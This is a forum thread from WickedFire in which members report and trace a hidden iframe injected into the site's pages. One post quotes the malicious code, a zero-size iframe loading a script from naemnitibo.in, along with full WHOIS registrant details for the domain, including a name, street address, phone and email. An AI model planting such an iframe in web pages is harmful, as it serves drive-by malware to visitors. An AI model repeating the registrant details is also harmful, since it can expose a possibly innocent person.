Malware on WickedFire?

[knukk]

I have AVG Internet Security & using Firefox and getting no errors ! is it fixed ?

No.

But Firefox has that website on automatic block, so it won't access it without your consent.

 

[kblessinggr]

Here's Google's diagnostic page about that website: Google Safe Browsing diagnostic page for naemnitibo.in

Site is listed as suspicious - visiting this web site may harm your computer.

A lot of hooha as being marked as suspicious. Shame its not a simple matter of putting naemnitibo.in into the hosts file to have it pointed to localhost (since the warnings are triggered by either name and ip)

 

[kblessinggr]

You know, I honestly thought that WF got flagged due to makemoniesonline.com and people who keep thinking its malware... shame my expectations were a bust.

 

[turbolapp]

No.

But Firefox has that website on automatic block, so it won't access it without your consent.

I have AVG and am on FF as well so I don't see what you guys are talking about either. It requires an admin to fix anyways so I'm pretty useless here.

 

[knukk]

I have AVG and am on FF as well so I don't see what you guys are talking about either. It requires an admin to fix anyways so I'm pretty useless here.

Well, if you want to see for yourself you can go to http://naemnitibo.in. Firefox will block the access and give you the option to enter it if you'd like.

If you take a look into the source code of every page on Wickedfire now, you'll see that an iframe has been imprinted, which loads naemnitibo.in. Maybe it is a bug that has been exploited. The forums over at DevShed have also been attacked by this fuck (see this thread).

 

[kblessinggr]

Well, if you want to see for yourself you can go to http://naemnitibo.in. Firefox will block the access and give you the option to enter it if you'd like.

If you take a look into the source code of every page on Wickedfire now, you'll see that an iframe has been imprinted, which loads naemnitibo.in. Maybe it is a bug that has been exploited. The forums over at DevShed have also been attacked by this fuck (see this thread).

If it's an iframe, firefox has the warning shown within the iframe itself, as opposed to the parent frame.

 

[invisible777]

Wow, thank god for Firefox.

This iframing douchebag needs to be hung by his balls.

 

[amfire]

working fine with FF. do not see any warning.

 

[Rage9]

I didn't see any warning in Firefox either.

 

[knukk]

If it's an iframe, firefox has the warning shown within the iframe itself, as opposed to the parent frame.

Yes, that's why users of Firefox shouldn't worry even though they haven't seen any warning.

 

[Webferret]

so the question is... what are we going to do to this fuck.

and 'novel' suggestions?

 

[AdHustler]

I'll let Jon know.

 

[puroz]

firefox + noscript + ubuntu = lolz @ virus

 

[Brandon]

Stanley took care of it. Thx for letting us know.

 

[zimok]

Stanley took care of it. Thx for letting us know.

No problem, I'll take a 5 minute video of turbolapp walking on her turbostation as my reward.

From this angle please, thanks

 

[turbolapp]

^^Dude. That is so wrong.

My LCD screen is so much bigger than that.

 

[Brandon]

Hahahaha!

^^Dude. That is so wrong.

My LCD screen is much so much bigger than that.

 

[zimok]

^^Dude. That is so wrong.

My LCD screen is much so much bigger than that.

Anything else my princess?

 

[xmcp123]

Found it...

<pre class="alt2" dir="ltr" style="
        margin: 0px;
        padding: 6px;
        border: 1px inset;
        width: 640px;
        height: 34px;
        text-align: left;
        overflow: auto"><iframe src="http://naemnitibo.in/cn.php?hyc" width="0" height="0"></iframe></pre>

Here's the domain info for this stupid fuck. Obviously it's anonymous but I'm hoping Shady will show up soon and dig a little deeper than I can.

Domain Name:NAEMNITIBO.IN
Created On:18-May-2009 15:34:44 UTC
Last Updated On:18-May-2009 15:37:31 UTC
Expiration Date:18-May-2010 15:34:44 UTC
Sponsoring Registrar:Web Commerce Communications Limited dba WebNic.cc (R105-AFIN)
Status:TRANSFER PROHIBITED
Registrant ID:WN13571799T
Registrant Name:Alexander Kalinin
Registrant Organizationrivate person
Registrant Street1:ulitsa Dolskaya d.10 kv.33
Registrant Street2:
Registrant Street3:
Registrant City:Moskva
Registrant State/Province:Moskva
Registrant Postal Code:115569
Registrant Country:RU
Registrant Phone:+7.49573431510
Registrant Phone Ext.:
Registrant FAX:+0.0
Registrant FAX Ext.:
Registrant Email:statue@mediahouse.at
Admin ID:WN13571800T
Admin Name:Alexander Kalinin
Admin Organizationrivate person
Admin Street1:ulitsa Dolskaya d.10 kv.33
Admin Street2:
Admin Street3:
Admin City:Moskva
Admin State/Province:Moskva
Admin Postal Code:115569
Admin Country:RU
Admin Phone:+7.49573431510
Admin Phone Ext.:
Admin FAX:+0.0
Admin FAX Ext.:
Admin Email:statue@mediahouse.at
Tech ID:WN13571801T
Tech Name:Alexander Kalinin
Tech Organizationrivate person
Tech Street1:ulitsa Dolskaya d.10 kv.33
Tech Street2:
Tech Street3:
Tech City:Moskva
Tech State/Province:Moskva
Tech Postal Code:115569
Tech Country:RU
Tech Phone:+7.49573431510
Tech Phone Ext.:
Tech FAX:+0.0
Tech FAX Ext.:
Tech Email:statue@mediahouse.at
Name Server:NS1.NAEMNITIBO.IN
Name Server:NS2.NAEMNITIBO.IN

No matter which way you cut it, the trail goes dead somewhere in Russia. Impossible to verify who's real.
The place is a bulletproof hosting provider.
The only other trail I could see goes to the UK, but the name is "Oleg Orlov"...some human rights politician in Russia. So it's probably just them fucking around.
I could get a little deeper in, but honestly it's a pain in the ass since I can't just visit the URLs.

 

[Stanley]

We removed all traces of the exploit but if it resurfaces send a PM to me & Brandon.